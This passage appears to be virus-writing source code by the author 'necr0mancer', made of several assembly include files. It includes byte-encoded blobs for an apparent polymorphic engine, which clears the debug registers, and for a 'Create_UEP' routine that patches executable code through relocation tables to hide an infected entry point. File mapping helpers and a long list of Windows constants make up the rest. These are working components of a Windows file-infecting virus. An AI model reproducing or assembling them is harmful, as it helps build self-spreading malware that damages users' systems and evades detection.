0FFh,0D1h,040h,066h,089h,085h,0FEh,002h,000h,000h,091h,058h,08Dh,075h,070h db 08Dh,07Dh,064h,0E8h,00Eh,003h,000h,000h,05Fh,057h,033h,0C0h,0E8h,0E1h,000h db 000h,000h,050h,0DBh,01Ch,024h,058h,06Ah,005h,058h,0E8h,03Eh,003h,000h,000h db 040h,091h,08Bh,044h,024h,004h,005h,000h,00Ch,000h,000h,089h,045h,05Ch,051h db 057h,00Fh,0B7h,085h,0FEh,002h,000h,000h,08Bh,0C8h,048h,08Dh,075h,064h,08Dh db 07Eh,006h,08Bh,0DFh,0E8h,0D1h,002h,000h,000h,05Fh,087h,0F3h,0ACh,08Ah,0F0h db 056h,033h,0C0h,0B0h,0FFh,0BBh,000h,000h,000h,000h,08Dh,075h,003h,0E8h,013h db 002h,000h,000h,08Dh,075h,05Ch,087h,026h,08Ah,0E6h,050h,08Bh,045h,060h,050h db 087h,026h,05Eh,0E2h,0DAh,059h,0E2h,0BBh,033h,0C0h,0E8h,047h,001h,000h,000h db 05Eh,060h,0FFh,0D6h,061h,05Fh,057h,08Bh,0DFh,081h,0C3h,000h,00Ch,000h,000h db 056h,053h,0B0h,001h,0E8h,062h,000h,000h,000h,0E8h,0A7h,001h,000h,000h,08Dh db 075h,05Ch,087h,026h,058h,089h,045h,060h,058h,08Bh,0DCh,087h,026h,08Bh,00Ch db 024h,03Bh,0D9h,077h,00Eh,08Ah,0F4h,0B4h,000h,08Dh,075h,003h,0E8h,0BAh,001h db 000h,000h,0EBh,0D8h,0B0h,001h,0E8h,000h,001h,000h,000h,08Bh,0DFh,05Eh,00Fh db 0B7h,085h,0FEh,002h,000h,000h,0B9h,000h,000h,000h,000h,066h,0F7h,0E1h,091h db 0F3h,0A5h,058h,02Bh,0F8h,089h,07Ch,024h,01Ch,0BFh,000h,000h,000h,000h,08Bh db 045h,058h,050h,0DBh,01Ch,024h,059h,02Bh,0D9h,003h,0C3h,0ABh,0F8h,061h,0C2h db 014h,000h,08Bh,0F7h,0FEh,0C8h,075h,008h,08Dh,08Dh,0ADh,003h,000h,000h,0EBh db 006h,08Dh,08Dh,0E0h,003h,000h,000h,033h,0C0h,048h,0E8h,04Eh,002h,000h,000h db 089h,045h,058h,0FFh,0D1h,057h,0DBh,004h,024h,058h,0B0h,0E8h,0AAh,033h,0C0h db 0ABh,0FFh,0D1h,052h,08Bh,085h,0BBh,003h,000h,000h,0E8h,030h,002h,000h,000h db 08Ah,074h,005h,070h,080h,0FEh,000h,074h,0ECh,0B0h,058h,00Ah,0C6h,0AAh,0FFh db 0D1h,066h,0B8h,081h,0E8h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,083h,0C0h,005h db 0ABh,0FFh,0D1h,051h,066h,0B8h,08Dh,080h,00Ah,0E6h,08Ah,075h,057h,08Ah,0D6h db 0C0h,0E6h,003h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,02Bh,0DEh,003h,0C3h,089h db 0BDh,04Dh,002h,000h,000h,0ABh,059h,0FFh,0D1h,066h,0B8h,087h,0E0h,00Ah,0E2h db 066h,0ABh,05Ah,0FFh,0D1h,0B0h,0B8h,00Ah,0C2h,0AAh,052h,051h,0B8h,000h,000h db 000h,000h,099h,033h,0C9h,066h,0B9h,000h,000h,0C1h,0E1h,002h,066h,0F7h,0F1h db 040h,089h,085h,03Bh,002h,000h,000h,0ABh,059h,0FFh,0D1h,08Bh,0C7h,040h,089h db 085h,07Bh,003h,000h,000h,087h,0CAh,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,08Dh db 075h,064h,0ACh,00Ch,058h,0AAh,0FFh,0D2h,0E2h,0F8h,05Ah,0C3h,053h,050h,0FEh db 0C8h,075h,008h,08Dh,09Dh,0ADh,003h,000h,000h,0EBh,006h,08Dh,09Dh,0E0h,003h db 000h,000h,0FFh,0D3h,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,051h,08Dh,075h,064h db 003h,0F1h,04Eh,0FDh,0ACh,0FCh,00Ch,050h,0AAh,0FFh,0D3h,0E2h,0F6h,066h,0B8h db 081h,0C4h,066h,0ABh,058h,0C1h,0E0h,002h,0ABh,0FFh,0D3h,066h,0B8h,048h,074h db 00Ah,0C2h,066h,0ABh,057h,0AAh,0FFh,0D3h,0B0h,0E9h,0AAh,0BEh,000h,000h,000h db 000h,08Bh,0C7h,083h,0C0h,005h,02Bh,0C6h,0F7h,0D8h,0ABh,0FFh,0D3h,087h,0FEh db 05Fh,08Bh,0C6h,02Bh,0C7h,048h,0AAh,087h,0FEh,0FFh,0D3h,066h,0B8h,087h,0E0h db 00Ah,065h,057h,066h,0ABh,0FFh,0D3h,058h,0FEh,0C8h,074h,003h,0B0h,0C3h,0AAh db 05Bh,0C3h,060h,0B8h,006h,000h,000h,000h,0E8h,015h,001h,000h,000h,040h,091h db 0B8h,000h,000h,000h,000h,0E8h,009h,001h,000h,000h,08Ah,074h,005h,070h,0B8h db 0FFh,000h,000h,000h,08Dh,075h,027h,0BBh,000h,000h,000h,000h,0E8h,007h,000h db 000h,000h,0E2h,0DEh,089h,03Ch,024h,061h,0C3h,060h,03Ch,0FFh,074h,016h,0C6h db 045h,056h,001h,08Dh,004h,086h,00Fh,0B6h,058h,003h,08Dh,004h,09Eh,08Ah,050h db 002h,066h,08Bh,000h,0EBh,017h,0C6h,045h,056h,000h,093h,0E8h,0C7h,000h,000h db 000h,089h,044h,024h,01Ch,08Dh,004h,086h,08Ah,050h,002h,066h,08Bh,000h,08Ah db 0EAh,080h,0FEh,000h,075h,006h,00Fh,0BAh,0E2h,002h,073h,062h,080h,0E2h,003h db 00Ah,0D2h,074h,013h,0FEh,0CAh,074h,007h,08Ah,0D6h,0C0h,0E2h,003h,00Ah,0E2h db 00Ah,0E4h,075h,002h,00Ah,0C6h,00Ah,0E6h,08Ah,0D5h,080h,0E2h,0C0h,0C0h,0EAh db 006h,0FEh,0CAh,075h,003h,0AAh,0EBh,002h,066h,0ABh,08Ah,0D5h,080h,0E2h,038h db 0C0h,0EAh,003h,0FEh,04Dh,056h,074h,00Dh,033h,0C0h,048h,0E8h,06Dh,000h,000h db 000h,089h,045h,060h,0EBh,003h,08Bh,045h,060h,080h,0FAh,004h,074h,00Bh,080h db 0FAh,002h,074h,009h,0FEh,0CAh,074h,009h,0EBh,00Ah,0ABh,0EBh,007h,066h,0ABh db 0EBh,003h,033h,0C0h,0AAh,089h,03Ch,024h,061h,0C3h,060h,049h,074h,02Bh,050h db 058h,050h,0E8h,03Ah,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah db 045h,057h,074h,0EDh,0AAh,086h,0E0h,05Bh,0ACh,03Ah,0C2h,074h,0FBh,03Ah,045h db 057h,074h,0F6h,03Ah,0C4h,074h,0F2h,0AAh,0E2h,0EFh,061h,0C3h,093h,08Bh,0C3h db 0E8h,00Fh,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah,045h,057h db 074h,0EDh,0AAh,061h,0C3h,060h,050h,0B8h,078h,056h,034h,012h,0BFh,005h,084h db 008h,008h,0F7h,0E7h,040h,089h,085h,0D0h,004h,000h,000h,033h,0D2h,059h,00Bh db 0C9h,074h,006h,0F7h,0F1h,089h,054h,024h,01Ch,061h,0C3h,04Eh,050h,045h,033h db 032h,05Bh,031h,033h,031h,038h,05Dh,06Eh,065h,063h,072h,030h,06Dh,061h,06Eh db 063h,065h,072h,057h,00Fh,001h,04Ch,024h,0FEh,05Fh,089h,047h,008h,089h,047h db 018h,00Fh,023h,0C0h,00Fh,023h,0C8h,00Fh,023h,0D0h,00Fh,023h,0D8h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ ;Include file ring-3 InputOutput functions ;(c) necr0mancer ; ; necr0mancer2001@hotmail.com ;------------------------------- ;Input:edx=offset of filename fopen proc pushad xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push FILE_SHARE_READ + FILE_SHARE_WRITE push GENERIC_READ + GENERIC_WRITE push edx call [ebp+CreateFile @ex] inc eax ;eax=-1? jz fopen_exit dec eax fopen_exit: mov [esp._eax], eax popad retn fopen endp ;------------------------------- ;Input:ebx=handle fclose proc pushad push ebx call [ebp+CloseHandle @ex] popad retn fclose endp ;------------------------------- ;Input:ebx=handle file ; ecx=count of bytes to read ; edx=offset of bufer fread proc pushad push 0 lea eax,[ebp+offset bytesread @ex] push eax push ecx push edx push ebx call [ebp+ReadFile @ex] popad retn fread endp ;------------------------------- ;Input:ebx=handle file ; ecx=count of bytes to move fseek proc pushad push FILE_BEGIN push 0 push ecx push ebx call [ebp+SetFilePointer @ex] popad retn fseek endp ;------------------------------- ;Input:ebx=handle file ; ecx=count of bytes to write ; edi=offset of bufer fwrite proc pushad push 0 lea eax,[ebp+offset bytesread @ex] push eax push ecx push edi push ebx call [ebp+WriteFile @ex] popad retn fwrite endp f_createmap proc pusha xor eax,eax push eax ;for mapvievoffile push eax ;name push eax ;lowsize push eax ;highsize push PAGE_READWRITE push eax push ebx call [ebp+CreateFileMappingA @ex] xchg ebx,eax pop eax ;null push eax ;count bytes push eax ;lowsize push eax ;highsize push FILE_MAP_WRITE push ebx call [ebp+MapViewOfFile @ex] mov [esp+_eax],eax popa retn f_createmap endp f_closemap proc pusha push ebx call [ebp+UnmapViewOfFile @ex] popa retn f_closemap endp ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ ;It "engine" I have written for fun;) ;----------------------------------------------------------------------------- ;Create_UEP( ; dword VO // virtual offset ; *dword code // offset to .code section(already has read) ; *dword reloc // offset to .reloc section(already has read) ; dword num_records // count of records in table to rewrite ; *dword adr_modify // address of "replasing" proc ; *dword mask_table // pointer to a mask table ; ); ;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Create_UEP: db 060h,08Bh,074h,024h,02Ch,08Bh,07Ch,024h,028h,081h,0EFh,000h,010h,000h,000h db 003h,03Eh,08Bh,046h,004h,0BAh,008h,000h,000h,000h,052h,02Bh,0C2h,099h,0B9h db 002h,000h,000h,000h,066h,0F7h,0F1h,05Ah,091h,00Fh,0B7h,004h,016h,066h,025h db 0FFh,00Fh,003h,0C7h,056h,051h,093h,08Bh,074h,024h,040h,033h,0C0h,0ACh,00Fh db 0B6h,0C8h,066h,0ADh,00Bh,0C0h,074h,012h,049h,074h,008h,066h,039h,043h,0FEh db 074h,026h,0EBh,005h,038h,043h,0FEh,074h,01Fh,0EBh,0E4h,059h,05Eh,083h,0C2h db 002h,0E2h,0CAh,08Bh,046h,004h,003h,0F0h,099h,033h,0D2h,0BBh,000h,010h,000h db 000h,0F7h,0F3h,00Bh,0D2h,074h,095h,0F9h,0EBh,02Dh,093h,059h,05Eh,051h,057h db 0F8h,08Dh,05Ch,024h,038h,0FFh,00Bh,08Bh,00Bh,0E3h,01Bh,048h,048h,08Bh,0D8h db 02Bh,0C7h,003h,006h,087h,0DFh,093h,056h,08Bh,074h,024h,030h,08Bh,044h,024h db 040h,0FFh,0D0h,05Eh,05Fh,059h,0EBh,0BAh,05Fh,059h,061h,0C2h,018h,000h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ ;Windows95/NT assembly language include file by SMT/SMF. All rights reserved. ;Modifed by Necr0mancer.No rights reserved. NULL equ 0 TRUE equ 1 FALSE equ 0 MAX_PATH equ 260 PIPE_WAIT equ 00000000h PIPE_NOWAIT equ 00000001h PIPE_READMODE_BYTE equ 00000000h PIPE_READMODE_MESSAGE equ 00000002h PIPE_TYPE_BYTE equ 00000000h PIPE_TYPE_MESSAGE equ 00000004h SC_SIZE equ 0F000h SC_MOVE equ 0F010h SC_MINIMIZE equ 0F020h SC_MAXIMIZE equ 0F030h SC_NEXTWINDOW equ 0F040h SC_PREVWINDOW equ 0F050h SC_CLOSE equ 0F060h SC_VSCROLL equ 0F070h SC_HSCROLL equ 0F080h SC_MOUSEMENU equ 0F090h SC_KEYMENU equ 0F100h SC_ARRANGE equ 0F110h SC_RESTORE equ 0F120h SC_TASKLIST equ 0F130h SC_SCREENSAVE equ 0F140h SC_HOTKEY equ 0F150h SC_DEFAULT equ 0F160h SC_MONITORPOWER equ 0F170h SC_CONTEXTHELP equ 0F180h SC_SEPARATOR equ 0F00Fh WM_NULL equ 0000h WM_CREATE equ 0001h WM_DESTROY equ 0002h WM_MOVE equ 0003h WM_SIZE equ 0005h WM_ACTIVATE equ 0006h WA_INACTIVE equ 0 WA_ACTIVE equ 1 WA_CLICKACTIVE equ 2 WM_SETFOCUS equ 0007h WM_KILLFOCUS equ 0008h WM_ENABLE equ 000Ah WM_SETREDRAW equ 000Bh WM_SETTEXT equ 000Ch WM_GETTEXT equ 000Dh WM_GETTEXTLENGTH equ 000Eh WM_PAINT equ 000Fh WM_CLOSE equ 0010h WM_QUERYENDSESSION equ 0011h WM_QUIT equ 0012h WM_QUERYOPEN equ 0013h WM_ERASEBKGND equ 0014h WM_SYSCOLORCHANGE equ 0015h WM_ENDSESSION equ 0016h WM_SHOWWINDOW equ 0018h WM_WININICHANGE equ 001Ah WM_DEVMODECHANGE equ 001Bh WM_ACTIVATEAPP equ 001Ch WM_FONTCHANGE equ 001Dh WM_TIMECHANGE equ 001Eh WM_CANCELMODE equ 001Fh WM_SETCURSOR equ 0020h WM_MOUSEACTIVATE equ 0021h WM_CHILDACTIVATE equ 0022h WM_QUEUESYNC equ 0023h WM_GETMINMAXINFO equ 0024h WM_PAINTICON equ 0026h WM_ICONERASEBKGND equ 0027h WM_NEXTDLGCTL equ 0028h WM_SPOOLERSTATUS equ 002Ah WM_DRAWITEM equ 002Bh WM_MEASUREITEM equ 002Ch WM_DELETEITEM equ 002Dh WM_VKEYTOITEM equ 002Eh WM_CHARTOITEM equ 002Fh WM_SETFONT equ 0030h WM_GETFONT equ 0031h WM_SETHOTKEY equ 0032h WM_GETHOTKEY equ 0033h WM_QUERYDRAGICON equ 0037h WM_COMPAREITEM equ 0039h WM_COMPACTING equ 0041h WM_COMMNOTIFY equ 0044h ; /* no longer suported */ WM_WINDOWPOSCHANGING equ 0046h WM_WINDOWPOSCHANGED equ 0047h WM_POWER equ 0048h WM_COPYDATA equ 004Ah WM_CANCELJOURNAL equ 004Bh WM_NOTIFY equ 004Eh WM_INPUTLANGCHANGERequEST equ 0050h WM_INPUTLANGCHANGE equ 0051h WM_TCARD equ 0052h WM_HELP equ 0053h WM_USERCHANGED equ 0054h WM_NOTIFYFORMAT equ 0055h NFR_ANSI equ 1h NFR_UNICODE equ 2h NF_QUERY equ 3h NF_RequERY equ 4h WM_CONTEXTMENU equ 007Bh WM_STYLECHANGING equ 007Ch WM_STYLECHANGED equ 007Dh WM_DISPLAYCHANGE equ 007Eh WM_GETICON equ 007Fh WM_SETICON equ 0080h WM_NCCREATE equ 0081h WM_NCDESTROY equ 0082h WM_NCCALCSIZE equ 0083h WM_NCHITTEST equ 0084h WM_NCPAINT equ 0085h WM_NCACTIVATE equ 0086h WM_GETDLGCODE equ 0087h WM_NCMOUSEMOVE equ 00A0h WM_NCLBUTTONDOWN equ 00A1h WM_NCLBUTTONUP equ 00A2h WM_NCLBUTTONDBLCLK equ 00A3h WM_NCRBUTTONDOWN equ 00A4h WM_NCRBUTTONUP equ 00A5h WM_NCRBUTTONDBLCLK equ 00A6h WM_NCMBUTTONDOWN equ 00A7h WM_NCMBUTTONUP equ 00A8h WM_NCMBUTTONDBLCLK equ 00A9h WM_KEYFIRST equ 0100h WM_KEYDOWN equ 0100h WM_KEYUP equ 0101h WM_CHAR equ 0102h WM_DEADCHAR equ 0103h WM_SYSKEYDOWN equ 0104h WM_SYSKEYUP equ 0105h WM_SYSCHAR equ 0106h WM_SYSDEADCHAR equ 0107h WM_KEYLAST equ 0108h WM_IME_STARTCOMPOSITION equ 010Dh WM_IME_ENDCOMPOSITION equ 010Eh WM_IME_COMPOSITION equ 010Fh WM_IME_KEYLAST equ 010Fh WM_INITDIALOG equ 0110h WM_COMMAND equ 0111h WM_SYSCOMMAND equ 0112h WM_TIMER equ 0113h WM_HSCROLL equ 0114h WM_VSCROLL equ 0115h WM_INITMENU equ 0116h WM_INITMENUPOPUP equ 0117h WM_MENUSELECT equ 011Fh WM_MENUCHAR equ 0120h WM_ENTERIDLE equ 0121h WM_CTLCOLORMSGBOX equ 0132h WM_CTLCOLOREDIT equ 0133h WM_CTLCOLORLISTBOX equ 0134h WM_CTLCOLORBTN equ 0135h WM_CTLCOLORDLG equ 0136h WM_CTLCOLORSCROLLBAR equ 0137h WM_CTLCOLORSTATIC equ 0138h WM_MOUSEFIRST equ 0200h WM_MOUSEMOVE equ 0200h WM_LBUTTONDOWN equ 0201h WM_LBUTTONUP equ 0202h WM_LBUTTONDBLCLK equ 0203h WM_RBUTTONDOWN equ 0204h WM_RBUTTONUP equ 0205h WM_RBUTTONDBLCLK equ 0206h WM_MBUTTONDOWN equ 0207h WM_MBUTTONUP equ 0208h WM_MBUTTONDBLCLK equ 0209h WM_MOUSEWHEEL equ 020Ah WM_PARENTNOTIFY equ 0210h MENULOOP_WINDOW equ 0h MENULOOP_POPUP equ 1h WM_ENTERMENULOOP equ 0211h WM_EXITMENULOOP equ 0212h WM_SIZING equ 0214h WM_CAPTURECHANGED equ 0215h WM_MOVING equ 0216h WM_POWERBROADCAST equ 0218h WM_DEVICECHANGE equ 0219h WM_IME_SETCONTEXT equ 0281h WM_IME_NOTIFY equ 0282h WM_IME_CONTROL equ 0283h WM_IME_COMPOSITIONFULL equ 0284h WM_IME_SELECT equ 0285h WM_IME_CHAR equ 0286h WM_IME_KEYDOWN equ 0290h WM_IME_KEYUP equ 0291h WM_MDICREATE equ 0220h WM_MDIDESTROY equ 0221h WM_MDIACTIVATE equ 0222h WM_MDIRESTORE equ 0223h WM_MDINEXT equ 0224h WM_MDIMAXIMIZE equ 0225h WM_MDITILE equ 0226h WM_MDICASCADE equ 0227h WM_MDIICONARRANGE equ 0228h WM_MDIGETACTIVE equ 0229h WM_MDISETMENU equ 0230h WM_ENTERSIZEMOVE equ 0231h WM_EXITSIZEMOVE equ 0232h WM_DROPFILES equ 0233h WM_MDIREFRESHMENU equ 0234h WM_MOUSEHOVER equ 02A1h WM_MOUSELEAVE equ 02A3h WM_CUT equ 0300h WM_COPY equ 0301h WM_PASTE equ 0302h WM_CLEAR equ 0303h WM_UNDO equ 0304h WM_RENDERFORMAT equ 0305h WM_RENDERALLFORMATS equ 0306h WM_DESTROYCLIPBOARD equ 0307h WM_DRAWCLIPBOARD equ 0308h WM_PAINTCLIPBOARD equ 0309h WM_VSCROLLCLIPBOARD equ 030Ah WM_SIZECLIPBOARD equ 030Bh WM_ASKCBFORMATNAME equ 030Ch WM_CHANGECBCHAIN equ 030Dh WM_HSCROLLCLIPBOARD equ 030Eh WM_QUERYNEWPALETTE equ 030Fh WM_PALETTEISCHANGING equ 0310h WM_PALETTECHANGED equ 0311h WM_HOTKEY equ 0312h WM_PRINT equ 0317h WM_PRINTCLIENT equ 0318h WM_HANDHELDFIRST equ 0358h WM_HANDHELDLAST equ 035Fh WM_AFXFIRST equ 0360h WM_AFXLAST equ 037Fh WM_PENWINFIRST equ 0380h WM_PENWINLAST equ 038Fh MB_OK equ 000000000h MB_OKCANCEL equ 000000001h MB_ABORTRETRYIGNORE equ 000000002h MB_YESNOCANCEL equ 000000003h MB_YESNO equ 000000004h MB_RETRYCANCEL equ 000000005h MB_TYPEMASK equ 00000000fh MB_ICONHAND equ 000000010h MB_ICONQUESTION equ 000000020h MB_ICONEXCLAMATION equ 000000030h MB_ICONASTERISK equ 000000040h MB_ICONMASK equ 0000000f0h MB_ICONINFORMATION equ 000000040h MB_ICONSTOP equ 000000010h MB_DEFBUTTON1 equ 000000000h MB_DEFBUTTON2 equ 000000100h MB_DEFBUTTON3 equ 000000200h MB_DEFMASK equ 000000f00h MB_APPLMODAL equ 000000000h MB_SYSTEMMODAL equ 000001000h MB_TASKMODAL equ 000002000h MB_NOFOCUS equ 000008000h IDNO equ 7 IDYES equ 6 IDCANCEL equ 2 SB_HORZ equ 0 SB_VERT equ 1 SB_CTL equ 2 SB_BOTH equ 3 SB_THUMBPOSITION equ 4 SB_ENDSCROLL equ 8 SW_HIDE equ 00h SW_SHOWNORMAL equ 01h SW_SHOWMINIMIZED equ 02h SW_SHOWMAXIMIZED equ 03h SW_SHOW equ 05h SW_RESTORE equ 09h SW_SHOWDEFAULT equ 0Ah WM_USER equ 0400h WS_POPUP equ 080000000h WS_CHILD equ 040000000h WS_MINIMIZE equ 020000000h WS_VISIBLE equ 010000000h WS_MAXIMIZE equ 001000000h WS_CAPTION equ 000C00000h WS_BORDER equ 000800000h WS_DLGFRAME equ 000400000h WS_VSCROLL equ 000200000h WS_HSCROLL equ 000100000h WS_SYSMENU equ 000080000h ;WS_SIZEBOX equ 000040000h WS_MINIMIZEBOX equ 000020000h WS_MAXIMIZEBOX equ 000010000h WS_OVERLAPPEDWINDOW equ 000CF0000h WS_EX_NOPARENTNOTIFY equ 000000004h WS_EX_WINDOWEDGE equ 000000100h WS_EX_CLIENTEDGE equ 000000200h WS_EX_OVERLAPPEDWINDOW equ WS_EX_WINDOWEDGE + WS_EX_CLIENTEDGE CS_VREDRAW equ 00001h CS_HREDRAW equ 00002h CS_PARENTDC equ 00080h CS_BYTEALIGNWINDOW equ 02000h BDR_RAISEDOUTER equ 01h BDR_SUNKENOUTER equ 02h BDR_RAISEDINNER equ 04h BDR_SUNKENINNER equ 08h EDGE_RAISED equ BDR_RAISEDOUTER + BDR_RAISEDINNER EDGE_SUNKEN equ BDR_SUNKENOUTER + BDR_SUNKENINNER EDGE_ETCHED equ BDR_SUNKENOUTER + BDR_RAISEDINNER EDGE_BUMP equ BDR_RAISEDOUTER + BDR_SUNKENINNER BF_LEFT equ 01h BF_TOP equ 02h BF_RIGHT equ 04h BF_BOTTOM equ 08h BF_RECT equ BF_LEFT + BF_TOP + BF_RIGHT + BF_BOTTOM IDOK equ 1 IDCANCEL equ 2 IDABORT equ 3 IDRETRY equ 4 IDIGNORE equ 5 IDYES equ 6 IDNO equ 7 IDCLOSE equ 8 IDHELP equ 9 COLOR_BTNFACE equ 15 DLGWINDOWEXTRA equ 30 IDC_ARROW equ 32512 WM_CTLCOLORDLG equ 136h WM_SETFOCUS equ 7 WM_KEYFIRST equ 0100h WM_KEYDOWN equ 0100h WM_KEYUP equ 0101h WM_CHAR equ 0102h WM_DEADCHAR equ 0103h WM_SYSKEYDOWN equ 0104h WM_SYSKEYUP equ 0105h WM_SYSCHAR equ 0106h WM_SYSDEADCHAR equ 0107h WM_KEYLAST equ 0108h WM_SETICON equ 80h DS_3DLOOK equ 0004H DS_FIXEDSYS equ 0008H DS_NOFAILCREATE equ 0010H DS_CONTROL equ 0400H DS_CENTER equ 0800H DS_CENTERMOUSE equ 1000H DS_CONTEXTHELP equ 2000H DS_ABSALIGN equ 01h DS_SYSMODAL equ 02h DS_LOCALEDIT equ 20h DS_SETFONT equ 40h DS_MODALFRAME equ 80h DS_NOIDLEMSG equ 100h DS_SETFOREGROUND equ 200h FILE_FLAG_WRITE_THROUGH equ 80000000h FILE_FLAG_OVERLAPPED equ 40000000h FILE_FLAG_NO_BUFFERING equ 20000000h FILE_FLAG_RANDOM_ACCESS equ 10000000h FILE_FLAG_SequENTIAL_SCAN equ 08000000h FILE_FLAG_DELETE_ON_CLOSE equ 04000000h FILE_FLAG_BACKUP_SEMANTICS equ 02000000h FILE_FLAG_POSIX_SEMANTICS equ 01000000h CREATE_NEW equ 1 CREATE_ALWAYS equ 2 OPEN_EXISTING equ 3 OPEN_ALWAYS equ 4 TRUNCATE_EXISTING equ 5 GMEM_FIXED equ 0000h GMEM_MOVEABLE equ 0002h GMEM_NOCOMPACT equ 0010h GMEM_NODISCARD equ 0020h GMEM_ZEROINIT equ 0040h GMEM_MODIFY equ 0080h GMEM_DISCARDABLE equ 0100h GMEM_NOT_BANKED equ 1000h GMEM_SHARE equ 2000h GMEM_DDESHARE equ 2000h GMEM_NOTIFY equ 4000h GMEM_LOWER equ GMEM_NOT_BANKED GMEM_VALID_FLAGS equ 7F72h GMEM_INVALID_HANDLE equ 8000h LMEM_FIXED equ 0000h LMEM_MOVEABLE equ 0002h LMEM_NOCOMPACT equ 0010h LMEM_NODISCARD equ 0020h LMEM_ZEROINIT equ 0040h LMEM_MODIFY equ 0080h LMEM_DISCARDABLE equ 0F00h LMEM_VALID_FLAGS equ 0F72h LMEM_INVALID_HANDLE equ 8000h LHND equ (LMEM_MOVEABLE or LMEM_ZEROINIT) LPTR equ (LMEM_FIXED or LMEM_ZEROINIT) NONZEROLHND equ (LMEM_MOVEABLE) NONZEROLPTR equ (LMEM_FIXED) LMEM_DISCARDED equ 4000h LMEM_LOCKCOUNT equ 00FFh DRIVE_UNKNOWN equ 0 DRIVE_NO_ROOT_DIR equ 1 DRIVE_REMOVABLE equ 2 DRIVE_FIXED equ 3 DRIVE_REMOTE equ 4 DRIVE_CDROM equ 5 DRIVE_RAMDISK equ 6 FILE_TYPE_UNKNOWN equ 0000h FILE_TYPE_DISK equ 0001h FILE_TYPE_CHAR equ 0002h FILE_TYPE_PIPE equ 0003h FILE_TYPE_REMOTE equ 8000h ;================================ WINNT.H =============== FILE_READ_DATA equ ( 0001h ) FILE_LIST_DIRECTORY equ ( 0001h ) FILE_WRITE_DATA equ ( 0002h ) FILE_ADD_FILE equ ( 0002h ) FILE_APPEND_DATA equ ( 0004h ) FILE_ADD_SUBDIRECTORY equ ( 0004h ) FILE_CREATE_PIPE_INSTANCE equ ( 0004h ) FILE_READ_EA equ ( 0008h ) FILE_WRITE_EA equ ( 0010h ) FILE_EXECUTE equ ( 0020h ) FILE_TRAVERSE equ ( 0020h ) FILE_DELETE_CHILD equ ( 0040h ) FILE_READ_ATTRIBUTES equ ( 0080h ) FILE_WRITE_ATTRIBUTES equ ( 0100h ) ;FILE_ALL_ACCESS equ (STANDARD_RIGHTS_RequIRED or SYNCHRONIZE or 1FFh) ;FILE_GENERIC_READ equ (STANDARD_RIGHTS_READ or FILE_READ_DATA or FILE_READ_ATTRIBUTES or FILE_READ_EA or SYNCHRONIZE) ;FILE_GENERIC_WRITE equ (STANDARD_RIGHTS_WRITE or FILE_WRITE_DATA or FILE_WRITE_ATTRIBUTES or FILE_WRITE_EA or FILE_APPEND_DATA or SYNCHRONIZE) ;FILE_GENERIC_EXECUTE equ (STANDARD_RIGHTS_EXECUTE or FILE_READ_ATTRIBUTES or FILE_EXECUTE or SYNCHRONIZE) FILE_SHARE_READ equ 00000001h FILE_SHARE_WRITE equ 00000002h FILE_SHARE_DELETE equ 00000004h FILE_ATTRIBUTE_READONLY equ 00000001h FILE_ATTRIBUTE_HIDDEN equ 00000002h FILE_ATTRIBUTE_SYSTEM equ 00000004h FILE_ATTRIBUTE_DIRECTORY equ 00000010h FILE_ATTRIBUTE_ARCHIVE equ 00000020h FILE_ATTRIBUTE_NORMAL equ 00000080h FILE_ATTRIBUTE_TEMPORARY equ 00000100h FILE_ATTRIBUTE_COMPRESSED equ 00000800h FILE_ATTRIBUTE_OFFLINE equ 00001000h FILE_NOTIFY_CHANGE_FILE_NAME equ 00000001h FILE_NOTIFY_CHANGE_DIR_NAME equ 00000002h FILE_NOTIFY_CHANGE_ATTRIBUTES equ 00000004h FILE_NOTIFY_CHANGE_SIZE equ 00000008h FILE_NOTIFY_CHANGE_LAST_WRITE equ 00000010h FILE_NOTIFY_CHANGE_LAST_ACCESS equ 00000020h FILE_NOTIFY_CHANGE_CREATION equ 00000040h FILE_NOTIFY_CHANGE_SECURITY equ 00000100h FILE_ACTION_ADDED equ 00000001h FILE_ACTION_REMOVED equ 00000002h FILE_ACTION_MODIFIED equ 00000003h FILE_ACTION_RENAMED_OLD_NAME equ 00000004h FILE_ACTION_RENAMED_NEW_NAME equ 00000005h FILE_CASE_SENSITIVE_SEARCH equ 00000001h FILE_CASE_PRESERVED_NAMES equ 00000002h FILE_UNICODE_ON_DISK equ 00000004h FILE_PERSISTENT_ACLS equ 00000008h FILE_FILE_COMPRESSION equ 00000010h FILE_VOLUME_IS_COMPRESSED equ 00008000h 